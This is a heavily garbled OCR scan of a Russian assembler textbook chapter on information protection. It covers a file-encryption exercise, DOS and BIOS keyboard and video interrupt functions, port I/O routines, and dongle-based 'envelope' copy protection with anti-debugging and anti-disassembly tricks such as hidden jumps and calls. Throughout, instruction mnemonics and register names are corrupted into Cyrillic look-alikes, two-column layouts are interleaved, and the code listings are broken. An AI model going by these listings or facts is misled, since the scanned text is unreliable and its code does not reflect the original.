сегментного регистра 05 


Хеширование пароля и 
определение ключа 


| пож» 
Ожидание ввода 
с клавиатуры чтение содержимого файла 
в буфер 
| оное __ 
Шифрование файла 
Вывод на экран запроса 
на ввод пароля Запись содержимого буфера 
обратно в файл 


Ожидание ввода 
с клавиатуры 


Вывод на экран запроса 
на ввод имени файла 


Закрытие файла 


Ввод пароля 
Завершение программы 


Рис. 1.2.4. Алгоритм работы программы шифрования файлов 


В программе используются простейшие алгоритмы хеширования 
и шифрования, не обеспечивающие даже минимального уровня защиты. 


` 


х защиты информац, | 
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7 


Глава 


симв" 


Задания 9^я самостоятельной работы ` 


ь - 
р Прелусмотрет шифрование файлов произвольного объема, например, за счет считы 
в › - 
вания файла уфер Вц по частям. Для определения длины файла можно восп 
ваться, например, функцией установки указателя. олЬЗО- 


2) Предусмотреть реакцию на неправильные действия пользователя (ввод и. 
пествующего файла и т. п... д имени несу- 


3} Реализовать процедуры ввода и вывода строк с ис 
№ По. 
фуикций ОАБи 09 прерывания т 21. льзованием соответственно 


4) Организовать ввод пароля без эха. Организовать двукратное запрашивание пароля 


5) Предусмотреть возможность шифрования всех файлов текущей директории 
1.210. Ввод-вывод информации 


1.2.10.1. Ввод информации с клавиатуры 


Каждое нажатие или 
отпускание клавиши приводит к генерации 8-разрядного скен-кода 


и последующей записи в буфер клавиатуры 16- 
клавише (или комбинации клавиш) (рис. 1.2.5). разрядного кода, соответствующего нажатой 


ОХ оХеХаХ а («ХХыХ) 


н|в|в| м Я 
88 59 | по | м1 ри | 54 
72] | бы | пос Ра 


©ооооооо 
ОНО 
ЕР 
9900909 
ин 
п 


оо 


Рис 1 2 
.в. .5. Скен-— 
О Коды клавиш в шестнадцатеричной форме записи 
Н-код с 
и одерж 
я ети фикатор код нажатия или отпускания (соответственно | и 0) в старшем разряде 
накеую аш ра риши в оставшихся разрядах. Скен-код однозначно указывает на 
в отьова ишу об позволяет определить, какие буквы, латинские или русские, вво 
пиво тель, тает ли он на нижнем или верх ка. 
и к рхнем регистре. Каждое нажатие на кла- 
и, цифрами перации 8-разрядного А5СИ-кода соответствующего символа Наряду 
другими знаками, набор символов АЗСИ содержит и управляющие 
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2. д еаииииииишиишин. АМА в задачах защиты информации, Глава 1. Основы программирования на Ассемблере ВМ РС 59 
символы, например символ возврата каретки СК (0ОЪ) и перехода на следующую строку [Е м («= =Х=) (=== Х=) р 
(ОАВ). За каждой клавишей, служащей для ввода отображаемых символов, закреплено не- |=) 2] в|“) [=] в Я в | [в [ма 2 | |9 | 55 ра 
У 
сколько АЗСИ-кодов. Для однозначного определения кода вводимого символа необходимо 
анализировать и запоминать факты нажатия управляющих клавиш ЗНЩ, СЫ АЪ, Сарз Роск 
и другие. При нажатии на клавишу (или комбинацию клавиш), соответствующую отображае- 
мому символу, в буфер клавиатуры помещается слово, старший байт которого — это скен-код 
клавиши, а младший — АЗСИ-код соответствующего символа. При нажатии на клавишу (или 
комбинацию клавиш), которая не имеет соответствующего отображаемого символа, при на- 
жатии на алфавитно-цифровую клавишу в комбинации с клавишей АЕ в буфер клавиатуры 
заносится 16-разрядный так называемый расширенный АЗСИ-код (рис. 1.2.6 и 1.2.7). Млад- 
ший байт этого кода всегда нулевой. 
и’ 7 М и’ М 
59) (аа) («Хи а 
5 | В 2 | 3 — (8 в |8 в) 5 | [о | Е91 | 12 ВЯ |4 Раизе| (2) (===) ое 
. - т | 9959 (=Х=Х=Х =) 
| вв] п] в] | во [гы |2] | № р 
й 
а 
м м р’ РА ГГгТ 
557 (6555 Е Г. б 
Е5С я УЗИ] #4 [2] вм :8 Е9 | 710 | 1 | 12 т |Рашзе) 
| |. Й За | 1обк | Рис 1.27. С 
Й - 1.2.7. Старшие (информационные) байты расши _ 
И форме записи: р ренных кодов АЗСИ в шестнадцатеричной 
а — при нажатии Си/клавиша; 
6 — при нажатии А/клавиша 
| В 
Ы . вод информации с клавиатуры можно осуществить одним из трех способов: 
использование файловой фу 
нкции РОЗ ЗЕй с помощью пре 
рерывания [М 
(см. раздел 1.2.8); р Т 21 
И исп в 
0 вание группы функций ввода-вывода 2О$ с номерами из диапазона О1В ... 
с помощью прерывания ПМТ 211; 
и 



































обращение к драйверу клавиатуры с помощью прерывания ПМТ 161. 


Рассмотрим некоторы 
е функции РО, вы 
Рис. 1.2.6. Старшие (информационные) байты расширенных кодов АСИ в шестнадцатеричной рые фу 'зываемые по прерыванию ПМТ 218. 


форме записи: 
а — при нажатии одной клавиши; 
б — при нажатии $ /клавиша 
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резине овен вони ини азии О имен, 


укзужикиянив иен ии и ноет пя зо отен вов ни о пинок винт ион ии ими помет, 


Ввод символа с ожиданием и выдачей эха 
Вводит символ из буфера клавиатуры и отображает его на экране в текущей позиции 
курсора. При отсутствии символа ждет ввода, Выполняет обработку СИ1-С. Для чтения 
расширенных кодов АЗСИ необходимо повторное выполнение функции. Допустимо 
перенаправление ввода. 
При вызове: 


АН =01Ь. 
При возврате: 
АТ, — байт входных данных (А$СП-код). 


068 


, осоки вввииьян оков во вооон ео ви снип попона кии нии пи ии о ви вии в вони ии нне мини» никно и нии вяз кое очи нии ятинонаь. 


Ввод-вывод символа 

В режиме ввода читает код символа из буфера клавиатуры. При отсутствии символа 
возвращает управление вызвавшей программе. Для чтения расширенных кодов АЗСП 
необходимо повторное выполнение функции. В режиме вывода выдает символ на экран 
в текущую позицию курсора. При задании кодов управляющих символов выполняются 
соответствующие им действия. Допустимо перенаправление ввода-вывода. 

При вызове: 
АН = 06Ъ; 
01, — код символа (00В — РЕВ) (при выводе); 
рь = РЕВ (при вводе). 


При возврате: 


0, АГ — байт входных данных; 


‚если символ есть, 2Р 


если символа нет, 2Е 1 (три вводе). 


08Ь 


а опиае инея вии вио нянь вании кии шин ов зо пот иооо ви пиранью пом иок в в покоя они руки мире ине ноя холинаяя вл ииввьяьте икзлляя чина * 


Ввод символа с ожиданием без эха 

“Вводит символ из буфера клавиатуры. При отсутствии символа ждет ввода. Выполня- 

ет обработку С&1-С. Для чтения расширенных кодов А$СИ необходимо повторное 
выполнение функции. Допустимо перенаправление ввода. 


При вызове: р 
АН = 086. 
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„озрова во ево ооо вов овиировоевоее .. . ... ... чинов оовонавииия нии ние оничия 
Ноооивво ноев ии и ии иное ововииосвень иене 
.. Баннер вивиени ВАЛО Й СОРА 


При возврате: 


ль — байт входных данных (АЗСП-код). 


ОАВ 


. какчкеляиминяянык миня цичени зкенеижчия жъзньниние ини нинамикя их ину я чья я ния я ны ян някияниинильаячь 
... нии инь 
« * канавы инуужия 


р Ввод строки символов 
Вводит строку длиной до 254 символов и отображает ее на экране. Строка должна 


заканчиваться символом возврата каретки (001), т. е. ввод заканчивается при нажатии на 
Ел{ег. До этого момента разрешается выполнять операции редактирования строки. При 
попытке ввести больше символов, чем задано, лишние символы игнорируются и выдает- 
ся звуковой сигнал. Выполняет обработку С&]-С. Допустимо перенаправление ввода 

- При вызове: 


АН = ОАВ; 
05: ОХ — адрес буфера пользователя. 
При возврате: 


заполненный буфер; формат буфера: 


байт 0 — ожидаемая дл 
ина строки с учетом символа возв 
ата каретки (указы 
при вызове), р р ы ит 
байт 1 — фактическая длина строки (заполняется функцией перед возвратом), 


байт 2 и по — 
| следующие — строка символов, заканчивающаяся кодом ООВ (заполняется 
функцией в процессе ввода символов). 


ивехиазлочьизиняе хиенжениыаылнчяичин ... 
чеяяиилыни взяжжияюны: 


Проверка состояния клавнатуры 


Проверяет наличие си 
мвола в буфере клавиатуры. Выполняет об 
Допустимо перенаправление ввода. работку сес 


При вызове: 


АН = ОВЬ. 

При возврате: 
АЬ = 0 нет символа; 
А = 


РРЬ — есть символ. 











































































































оСВ 


Очистка буфера клавиатуры и ввод 


Очишает кольцевой буфер клавиатуры и активизирует заданную функцию ввода 
(например, 011, 08в, ОАВ). 


„соли аи янки ани вымя 


При вызове: 
АН = ОСЬ; 
АТ, - требуемая функция ввода; 
0$: ОХ - адрес буфера пользователя (еслиАЬ = ОАВ). 
При возврате: 
Ат, — байт входных данных (если при вызове АЁ не равно (АВ); 
заполненный буфер (если при вызове АГ =ОАВ). 


Рассмотрим некоторые функции ВЮ$, вызываемые по прерыванию ПМТ 168. 


аист авиату 


Читает скен-код и АЗСП-код символа из буфера клавиатуры. Если буфер пуст, ожи- 
дает ввода. 
При вызове: 
АН = 008. 
При возврате: 
АН — скен-код или информационный (старший) байт расширенного кода, 
Ат — АЗСИ-код символа или младший (нулевой) байт расширенного кода. 
Примечание. 
Для 101/102 Кеу и 122 Кеу клавиатуры имеются аналогичные функции, соответствен- 
но 1бпи 208. 


ини и 


Определяет, есть или нет в буфере клавиатуры символы, ожидающие ввод 
символ имеется, считывает его код без извлечения последнего из буфера (101/102 Кеу). 
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При вызове: 
Ан = 018. 
При возврате: ^^ 
1Е = 0, АН — скен-код, АЬ — АЗСП-код символа, если символ есть; 


тг = 1, если символа нет. 


ионы 
| я клавиатурь 
Считывает слово флагов клавиатуры (101/102 Кеу) ыи 


При вызове: 
АН = 028. 


При возврате: 
АХ — слово флагов клавиатуры: 


А1, — младший байт: 
разряд 0 — нажата правая клавиша ЗЫ, 
разряд | — нажата левая клавиша ЗМ, 
разряд 2 — нажата любая клавиша СЫ1, 
разряд 3 — нажата любая клавиша АН, 
разряд 4 — включен режим ЗсгоН Госк 
разряд 5 — включен режим Мит Госк, | 
разряд 6 — включен режим Сарз Госк, 
разряд 7 — включен режим №5; 

АН -— старший байт: 
разряд 0 — нажата левая клавиша СЫ1, 
Разряд | — нажата левая клавиша АЦ, 
разряд 2 — нажата правая клавиша СЫ! 
Разряд 3 — нажата правая клавиша АК, 
Разряд 4 — нажата клавиша Зсго| Г.оск, 
Разряд 5 — нажата клавиша Ми Г.осК, 
Разряд 6 — нажата клавиша Сарз Г.оск. 
Разряд 7 — нажата клавиша 5уз Ва. | 
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1.2.10.2. Вывод текстовой информации на экран 
Вывод информации на экран в текстовом режиме можно осуществить одним из трех 
способов: 
= использование файловой функции РОЗ 40. с помощью прерывания ПМТ 21 (см. раз- 
дел 1.2.8); 
в использование группы функций ввода-вывода РО$ с номерами из диапазона ОТВ ... 
ОСЬ с помощью прерывания ПМТ 211; 
обращение к драйверу экрана с помощью прерывания ПМТ 101; 
# прямая запись в видеобуфер. 


Рассмотрим некоторые функции 20$, вызываемые по прерыванию ПМТ 218. 


028 


анкер скина а ао ваз киаьк: 


Вывод символа 


Выводит символ на экран в текущую позицию курсора. При задании кодов управ- 


ляющих символов выполняются соответствующие им действия. Выполняет обработку 
СН1-С. Допустимо перенаправление вывода. м 


При вызове: 
АН = 02Ъ. 
При возврате: 


рь — байт выходных данных. 


о9в 


зккние низликанеинаиии и ки ия ии вия кхе ини какое ть 


икея ниекенкя яя кики ии а ники нактауния жкнннии зазор жиязию хин яиху 


Вывод строки символов 


Вывод на экран строки символов из буфера пользователя. Вывод заканчивается при об- 
наружении символа "$". При задании кодов управляющих символов выполняются соответ” 
ствующие им действия. Выполняет обработку С1-С. Допустимо перенаправление вывола. 


При вызове: 
АН = 09%; 


0$: Ох - адрес буфера пользователя. 

Рассмотрим организацию текстового зидеобуфера. Информация, отображаемая #2 
экране, хранится в системной области оперативной памяти, называемой видеобуфером: 
В памяти может одновременно хранится $ независимых изображений — страниц, одна #3 
которых является активной. Любое изменение содержимого активной видеострании" 
немедленно отражается на экране. В текстовом режиме изображение обычно состоит из 
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ок по 80 симво й й 
25 стр лов в каждой строке. Каждый символ и фон за ним 
независимо один из 16 цветов. мотутиринимать 


КСТОВЫ 


страница 0880008 ... В8Е40В; 
страница 1 — В9000В ... В9Е40Н; 
страница 2 - ВАООбВ ... ВАЕ40В; 
страница 3 — ВВОО0В ... ВВЕ4ОВ; 
страница 4 — ВС000В ... ВСЕ40В; 
страница 5 — ВРОО00В ... ВОЕ4ОН; 
страница 6 — ВЕОО0В ... ВЕЕ4ОВ; 
страница 7 — ВЕОО0В ... ВЕЕ4ОН. 


Каждый символ заним 
ает в буфере 16-разрядное поле, при этом один байт отводится 


под АЗСП-код, гой — 
од 5 › другой — под атрибут символа (рис. 1.2.5). Коды символов запи 
В орядке, в котором они должны появляться на экране тИотя 


88001: 0001 88001: 0002 8в8001: 0003  В800Н: 0004 


АЗСП-код Атрибут А5СП-код Атрибут - | 
Символ 0 












Символ 1 





2 1 0 


мерцание 
символа 
или яркость фона 








яркость символа 
или выбор блока 
знакогенератора 





Коды цветов, действующие по умолчанию 
Цвет при сброшенном бите яркости 


д 
о 
= 


Цвет при установленном бите яркости 


ЕСИ 


Бирюзовый 


Фиолетовый 





Коричневый 


Рис 1.2 
"1. „8. (©) 
рганизация ст раницы видеобуфера (на примере нулевой видеост раницы) 


Рассмо 
трим некоторые функции В!О$, вызываемые по прерыванию ПМТ 106 
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Установка позиции курсора 
Устанавливает курсор в заданную позицию на указанной странице. 


При вызове: 


АН = 024; 

ВН — страница, 

ОН — строка; 

ОГ - столбец. 
ОЗЬ 


зачех о ьны 


Определение позиции курсора 


Определяет положение курсора на указанной странице. 


‚При вызове: | 


АН = 0ЗЬ; 
ВН — страница. 
При возврате: 
СН — первая строка развертки курсора; 
СТ — последняя строка развертки курсора; 
ОН — строка текушей позиции курсора; 
О! — столбец текущей позиции курсора. 


„пачианониииокинония но ниня ня ила ния ии кабин ини вая ии чения рии отно кори ника я японии ини ини пятен» иичиияяихь т 


Переключение видеострании 
Задает активную видеостраницу. 


При вызове: 
АН = 051; 
АТ — страница. 
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пи чииииининь я зиннжоикин ии ии ския жк зна вв во ыы воли вы выначьн 


— Инициализация и прокрутка окна вверх 

Выводит окно с заданными координатами путем вывода пробелов с заданным атри- 
бутом или прокручивает содержимое окна вверх на заданное число строк. Работает толь- 
ко сактивной видеостраницей. 


При вызове: 


АН = 0 6; 
Ат, — число строк прокрутки; если А№ = 0, окно очищается; 
ви -атрибут; 


ск - координата У верхнего левого угла; 
ст - координата Х верхнего левого угла; 
рн — координата У нижнего правого угла; 
оЪ - координата Х нижнего правого угла. 


071 


изтинаннья еек а изо хи ана ини ия нии ии зан аине нии ко и ини зи линииенизанние жа: 
зе ии еи ии ки инок ияиинииние ани уае аки анны, 


Инициализация и прокрутка окна вниз 
Выводит окно с заданными координатами путем вывода пробелов с заданным атри- 


бутом или прокручивает содержимое окна вниз на заданное число строк. Работает только 
с активной видеостраницей. 


При вызове: 


АН = 07; - 
АЪ — число строк прокрутки; если АЪ = 0, окно очищается; 
ВН - атрибут; 


СН - координата У верхнего левого угла; 
СЪ — координата Х верхнего левого угла; 
ОН - координата У нижнего правого угла; 
ОГ — координата Х нижнего правого угла. 


ТОВ (подфункция озр) 


озона ноя яз иво нии за ину маихьзаи Нокия яву ини вия навивки аи вв ь ино яв кои риныинькы прин и ввнияь та яия т 


Переключение бита "мерцание-яркость" 
Задает функциональное назначение старшего разряда кода атрибута. 
При вызове: 
АЕ = 10%; 
АБ = 03ь; 
ВЕ — назначение старшего бита кода атрибута: 
0 — яркость фона, 
1 — мерцание символа. 


3* 





Аи 
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6 ...-иииииииииииснилнттиииииититиитиииии ИТ зззовоне. 


138 


икея кизи нь нь ча чи иль нии ч ия ия соевое мини» эк втия ве гоа жа тияия 


Вывод строки символов 


Записывает строку на текущую страницу, начиная с указанной позиции. При выводе кодон 
управляющих символов выполняются соответствующие им действия. 


При вызове: 
АН = 138; 
А — режим: 
0 — атрибут в ВЬ, строка содержит только коды символов, курсор не смешается пос. 


записи; 
1 — атрибут в ВЬ, строка содержит только коды символов, курсор смещается после 


записи; 
2 — строка содержит чередующиеся коды символов и атрибутов, курсор не смещается 


после записи; 
3 — строка содержит чередующиеся коды символов и атрибутов, курсор смещается 


после записи, р 


ВН — страница; 

СХ — длина строки символов без учета байтов атрибутов; 
ОН - номер строки, 

От, — номер столбца; 


ЕС: ВР — адрес строки. 


Воспользовавшись знанием логической структуры видеобуфера (рис. 1.2.8), можно 
вывести текст на экран с помощью команд пересылки данных (например моуУ5), 


не прибегая ни к каким системным функциям. 


1.2.11. 


Как уже отмечалось в разделе 1.1, ЦИ и память взаимодействуют с внешними устрой: 
ствами (или УВВ) через порты ввода-вывода (ВВ). 
Типы портов ВВ: 

№ порты ВВ для буферирования входных и выходных данных, 

ш порты ВВ для хранения информации о состоянии ИБи УВВ (см. рис. 1.1.1), так назы” 
ваемые регистры-состояния; опрашивая эти регистры, программа узнает, что ИБ ии 
УВВ имеет данные для ввода в процессор или готово принимать данные из процессора: 

ш порты ВВ для восприятия приказов (примеры приказов: ЕОГ — сброс "самой приор" 
тетной" "1" в регистре /5К контроллера прерываний, В5К — установка/сброс разряде? 
в БИС параллельного периферийного адаптера). 


Программирование портов ввода-вывода 


ы 


Ро 


возвнение 69 
Взаимодействие с портами осуществляется командами ввода-вывода ПМ и ООТ 
рые обеспечивают передачу байта или слова. Операндом-приемником в вода 
ПМ и операндом-источником в команде вывода ОПТ могут быть только стр АТ (при 
передаче байта) или АХ (при передаче слова). Программный ВВ аклчается я 
рывной проверке состояния ИБ или УВВ и выполнении операций чтения рис 6, уже. 
нии состояния наличия данных для ввода в процессор и операций вывода при обнаруже. 
нии состояния готовности принимать данные от ЦП. ри ооаруже 
На рис. 1.2.9 показана типичная структура ИБ при выполнении операций паралл 
ного ввода-вывода. В состав ИБ входят два порта ВВ первого типа: порт ‚ 6 вр. 
ный регистр входных данных и буфер с третьим состоянием для Подключения урия 
правленной шине данных ОВ) и порт вывода (буферный регистр выходн р ных. 
порт ВВ второго типа (регистр состояния и буфер с третьим состоянием нь. 
ния к двунаправленной шине данных). Селектор адреса, анализи| и 
Нуар , рует код на шине адреса 
АВ мы ны шружении ры регистра входных данных, регистра выходных анных 
нь ответственно 40, 4] и 42) вырабатывает единичный сигнал на 
алом ых своих выходов. В режиме ОМА работа селектора адреса блоки- 
о водных мо я обеспечивает формирование сигналов записи 
битов готовности к вводу (ОВЕ — Ошрщш Вина И) и. воду ИВР шрш ВиНы РП) 
ний, и) и выводу (1ВЁР — шрш ВийЙег Ри) 


На рис. 1.2.9 показаны также входные и выходные сигналы УВВ: 
и ОГ(Раа шрий) — байт данных (входные данные для ЦП) с выхода УВВ; 
Ш ТВ (Знофе) — сигнал стробирования байта ОГ; 
и РО (Раз Оцри) — байт данных (выходные данные ЦП) на входе УВВ; 


1 
С СК (АскпоЕе4е) — сигнал подтверждения приема данных с выхода УВВ; 
а также сигнал АЕБ (Кезей) системного сброса. 
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ваВиет = 40 & 1ОВ, 








Системная магистраяь 


рабу = 42 & ТОК, 
И’"ВуеОш = 41& 10Й. 


Регистр 


Регистр — 


выходных 
данных 


Логические выражения сигналов установки и сброса разрядов готовности регистра 
состояний: 


баКаут = 5ТВ, 
бавауОш = ИтВуяе Ош, 
ДезеКаут = КаВуе + Кез, 


АО управления 


Кез! КауОш = Ас + Кез. 







Селектор 
адреса 


АВ 










































ВЗуТп - байт, содержащий 1 в разряде ОВР, ============еня===== 


Установка 
ВауОпЕ - байт, содержащий 1 в разряде 1ВЕ. 





1180 ОВ 11В125112е+2 РОР (?) 


Регистр 
состояния 


Ме5з ОВ 'ВиЕЕех оуегЕ]1оя !', ОБЬ, ОАВ 
| | Меззфеп = $ - Мезз 
И Со ПИ з ; Ячейка для хранения 
; фактической длины строки 
1ез 91, ТаВаЕ ; 65: ОГ -> ГВаЕ 
поу СомпЕ, 91 
поу сх, 1181Ё$12е+1 


; Максимальное число повторений 
; операции ввода байта 
с1а .; Движение по строке в сторону 
; старших адресов 


о — элемент с третьим состоянием 





18а: МехетпВуее: 
оу. ’ ах, АЗ ; Адрес регистра состояния 
| | сю рвы оесквути: провер{ готовности ко вводу === 
рис. 1.2.9. Структура интерфейсного блока (ИБ) при выполнении операция пар и ня а1, ах ; Чтение регистра состояния 
я сигналов чтения регистра входных данных, чтения | :9° 21, ВЧУТ } Проверка разряда готовности _ 
Логические выражения дл 32 СКесквау т ; Повторять до обнаружения ОВР = 1 


ыходных данных имеют вид: 


стра состояния И записи в регистр В 




































































72 Ассемблер в задачах защиты информации 








поу ах, АО ; Адрес регистра входных данных 
п а], 9х ; Чтение байта 
зозЬ ; Запись в ТПВаЕ 
стр а1, ОРь ; Проверить возврат 
1оорпа МехстпВуее ; каретки и повторить ° 
302 Оуех1оч; Если возврата каретки нет, 
; переполнение ТпВаЁ 
поУ : а1, ОАБВ ; Добавление 
зЕозЬ ; перевода строки. 
за $1, Соапе ; Запись фактической 
ие Соапе, 91 ; длины введенной строки 
Оуег1оч: 
143 $1, Мезз; 0$: 51 -> Ме55 
поу сх, МеззЬеп ; Число повторений операции вывода 
; байта 
МехЕВусе00с: 
поу Ях, А2 ; Адреб регистра состояния 
;=== Проверка готовности к выводу === й 
СпескВауО“е; | 
11 а], 9х ; Чтение регистра состояния 
{езе а1, Кау0че ; Проверка разряда готовности 
32 спескаауоу®е ; Повторять до обнаружения 1ВР = 1 
109$ ; Чтение байта в АБ 
поу Чх, А} ; Адрес регистра выходных данных 
оп Ях, а1 ; Вывод байта 
1оор МехЕВусе0чЕ ; Повторять МеззЬеп раз 





1.2.12. 


Пристыковочный механизм защиты программ 


1.2.12.1. Электронные ключи. Методы защиты программ 


Проблема защиты информации во всем мире доставляет производителям программ 
ного обеспечения массу хлопот. Одним из наиболее эффективных средств защиты по 
являются.электронные ключи (ЭК). 

ЭК — это небольшое устройство, либо подключаемое к параллельному или последова” 
тельному порту компьютера, либо находящееся внутри компьютера. В первом случа 
ключ, как правило, не влияет на работу порта и "прозрачен" для подсоединенных через 
него УВВ. Во втором случае предполагается, что ключ реализован в виде платы расии" 
рения, вставляемой в стандартные внутренние разъемы компьютера. Обычно ключ не 
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кз 


обладает встроенными источниками питания, полностью пассивен и при отключении от 
компьютера сохраняет записанную в себя информацию. ЭК разрабатываются с исполь- 
зованием заказных БИС, однокристальных микроконтроллеров (МК) или микроп оцес- 
соров (МП). Для пользователей портативных компьютеров производятся  ектронные 
ключи в стандарте РСМСТА размером с обычную кредитную карточку. 

Устойчивость к эмуляции является одним из главных критериев качества защиты 
Объектом эмуляции при этом может быть как протокол взаимодействия с ЭК, так и сам 
ключ. Методы защиты от эмуляции: | 





ш неопределенные ("зашумленные") протоколы взаимодействия с ЭК; 
> 
№ построение протоколов взаимодействия с ключом по принципу "случайный запрос — ответ"; 
3 
ш использование в составе ЭК непредсказуемых генераторов псевдослучайных кодов 
(ГИК), формирующих длинные статистически безопасные псевдослучайные последо- 
вательности (ПСП); | 
и использование ЭК в качестве внешнего вычислителя и определение внутри ключа 
значений односторонних функций (хеш-функций), которые влияют на ход выполне- 
ния программы; 


№ использование при реализации односторонних функций и функций обратной связи 
ГИК криптографических преобразований. 


Важной составной частью системы защиты с использованием ЭК является ее про- 
граммный компонент. Как правило, он включает в себя зашитый "конверт" (Епуеюоре. 
и библиотечные функции АРГ обращения к ключу. ы 

Защита с использованием пристыковочного механизма (Епуе!оре) заключается в сле- 
дующем. Тело защищаемой программы шифруется, и в него добавляется специальны? 
пристыковочный модуль (ПМ), который получает управление в момент запуска про 
ммы. ПМ „проверяет наличие ЭК, из которого затем считывается некая информация 
а я проверки которой принимается решение о загрузке и расшифровк‹ 
т а ани рограммы. После завершения этих пронедур ПМ выгружается из па 
ры а утравлег е передается основной программе. Функциями ПМ являются такж‹ 
а еского и динамического исследования и модификации алгоритма рабо 

и ты Протраммы и самой системы защиты. 
рн о олжны сть распределены по всему телу программы: 

ключа; 


пе 
Риодическая проверка целостности кода защищаемой программы; 


перио 
ыы дическая проверка времени выполнения отдельных фрагментов программы; 
аимодействие с ЭК по принципу "запрос — ответ"; 


считыв .. 
качест из ключа псевдослучайных кодов для дальнейшего их использовани; 
тве операндов, кодов операций, адресов переходов ит. п.; 
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ооо ни они ви вии опору и оон воно в ово и вери зоо я воно ви в оно в орви они я ное ви осо воно но ов ори в вов о оно ри ровно вне сотоновеное ›.., 


№ считывание из ключа ПСП для зашифрования, расшифрования или хеширования 
отдельных фрагментов кода программы; 

Ш обращение к памяти (в том числе и энергонезависимой) ключа для выполнения опе- 

раций записи/чтения. 

Методы защиты от исследования: 

шифрование (желательно по частям) исполняемого кода; 

Ш модификация исполняемого кода (ИК) — самогенерирующиеся команды, хеширова- 
ние адресов перехода, определение стека в области ИК, генерация ИК из заготовок, 
упорядоченных по каким-либо критериям, использование принципа взаимозаменяе- 
мости команд и др.; 

Ш использование альтернативных "скрытых" команд (например, переходы с помощью 
команд ВЕТ или ВЕТ); 

Ш включение "пустышек", ненужность которых неочевидна; 


Ш изменение начала защищаемой программы, чтобы стандартный дизассемблер не мог 
ее правильно дизассемблировать; 


Ш включение переходов по динамически изменяющимся адресам; 

М периодический подсчет контрольной суммы, области памяти, занимаемой программой 
в процессе выполнения; 

№ проверка содержимого таблицы векторов прерываний и первых команд обработчиков 
прерываний; 


ш переустановка используемых векторов прерываний для защиты от программ-} 


перехватчиков; 
# контроль времени выполнения отдельных частей программы; 


ш реализация каких-либо функций программы в обработчиках прерываний, используе- 3 
мых стандартными отладчиками, например прерываний пошаговой работы и кон- № 


трольной точки. 


Примеры 
;==== Скрытый ОМР. ==========8===ЕЕ=ЕЕЕЕ=Е=НЕЕЕЕНЕЕЕЕННЕНЕЕЕЕНЕНЕЯЕННЕЯ 
поу ах, ОРЕЗЕТ МехеТп$ех 
ризВ ах 
геё 
Мехе 11$: 


1==== Скрытый САШЬ. ===5===Е=ЕЕ=ЕРЕЕЕЕЕЕЕЕЕРЕЕНЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕ 


поу ах, ОРГЕЗЕТ ВебАааг 
ра5В ах 
пр Мургос , 


ВесАЧаг: 
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МуРтоС: 
==Е Скрытый ВЕТ. =========Е=ЕРЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕВЕЕЕЕЕЕЕЕЕЕНЕЕЕЕЕЕЫЕ 
' рор Ьх ‚ 
тр [5х] \ 


Модификация адреса перехода. 
„=== 5ЗН - КОП РОЗН ВХ, 4ЗН - КОП 1МС ВХ, 5ЗН&ЕЕВЬ = АЗН. 
апа ВУТЕ РТВ сз: МуГасвх, ОРЕБ 


ох Ьх, Бх и 


МугпсВХ: ри$В Ьх 






оу ИОВ РТВ сз: Мулар [рх], М№мАЗах 
Мехе1п5ег 


1.2.12.2. Программа М 2. Программа с пристыковочным 
модулем 


Ниже приведен простейший пример программы с ПМ (рис. 1.2.10), задачей которого яв 
ляется проверка легальности запуска зашишенной программы и, в зависимости от результато! 
проверки, либо передача управления на защищенную программу, либо реакция на действи: 
нарушителя конвенции. Предполагается, что ЭК представляет собой УВВ, подключаемо 
к системной магистрали компьютера, обмен информацией осуществляется по линиям ОВ7 .. 
ОВО шины данных. В простейшем случае ЭК - это генератор ПСП. Режим работы ЭК (сбро‹ 
инициализация и считывание ПСП) определяется адресом, по которому происходит обраще 
ние к ключу, и циклом шины (запись \/К. или чтение ВО). Соответствие между адресом, ци! 
лом шины и режимом работы ЭК отражено в таблице 1.2.2. 


Таблица 1.2.2. Логика работы Э 






Адрес порта ВВ Функции электронного ключа 


Программный сброс 


Инициализация 


















в режиме чтения ЭК 
Чтение ПСП 
Чтение состояния: 
разряд 0 - Вау; 
разряд 1 - Вау 








ВазеАЧаг + 1 


п При запуске защищенной программы управление передается на начало ПМ, которь 
оследовательно выполняет следующие действия (рис. 1.2.11): 


И) сброс ключа; 





м ` 
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2) проверка присутствия ЭК -— запись в ключ проверяющей последовательности байтов и пс БВ 
. ‚ . оС 
РааСРгез длиной ОСР&1хе и сравнение реакции ЭК с кодом присутствия \Ргез; при ‚ С6Р поу 4х, Вазедааг 
у 

положительном результате сравнения осуществляется переход к п. 3, в противном ое ах, а1 

случае происходит аварийное завершение с предварительной очисткой памяти, зани- ; Проверка наличия ЭК 

маемой образом программы с ПМ; с19 , 

й ран; поу сх, 0СР512е 

3) инициализация ЭК -— запись в ключ инициализирующей последовательности аа! поу 4х, Вазедааг+1 
длиной 01 31е; поу 31, ОРЕЗЕТ РатаСРгез 

$} аций СвескВаубиЕ1 : 

4) расшифрование защищенного фрагмента программы — выполнение 512е опер гам- {п а], ах ; Проверка 
мирования над одноименными байтами защищенного фрагмента и псевдослучайной по- Еез+ а1, Вукевауоае —; готовности ЭК 
следовательности с выхода ЭК; 32 СВесквауоиЕ1 ; к записи 

1093Ъ 
й ащищенного фрагмента; при , 

5) формирование и проверка контрольной суммы (КС) защищ фр ; Пр ро ах, а1 , Вывод байта ВаБаСргсь 
положительном результате сравнения осуществляется переход к п. 6, в противном 1оор Спескваури 
случае происходит аварийное завершение с предварительной очисткой памяти, зани- поу 9х, ВазеАЗаг ; Чтение 

й : т а1, ах ; реакции 
ой образом программы с ПМ , ; реакц 
маем р рогр , поу ав, а! ; К 

6) передача управления на защищенный фрагмент (3$) и после завершения его работы т а, 4х ; на ракасргез 

очистка памяти. стр ах, *Рхезепсе 
302 С1еагМем 
В качестве метода шифрования/расшифрования защищенного фрагмента предлагает- ; Инициализация ЭК 

ся использовать наложение (с помощью операции поразрядного ХОК) на входную ин- с13 

формационную последовательность ПСП с выхода ЭК, называемое гаммированием, по с Се . 

,, Те) х азе Е+ 

обеспечивающее максимальное быстродействие при минимальных программных затра- по\ 1 ОРЕЗЕТ рака1 14 

! 
тах. Криптостойкость гаммирования определяется качеством входящего в состав ключа Спесквауое2: 
ГПК - источника гаммирующей последовательности и эффективностью мероприятий по 11 а], ах ; Проверка 
защите от исследования тракта обмена информацией между ЭК и компьютером. сезе а1, Вукевдуоце ; готовности ЭК 
2 СпескВдуоче2 ; к записи 
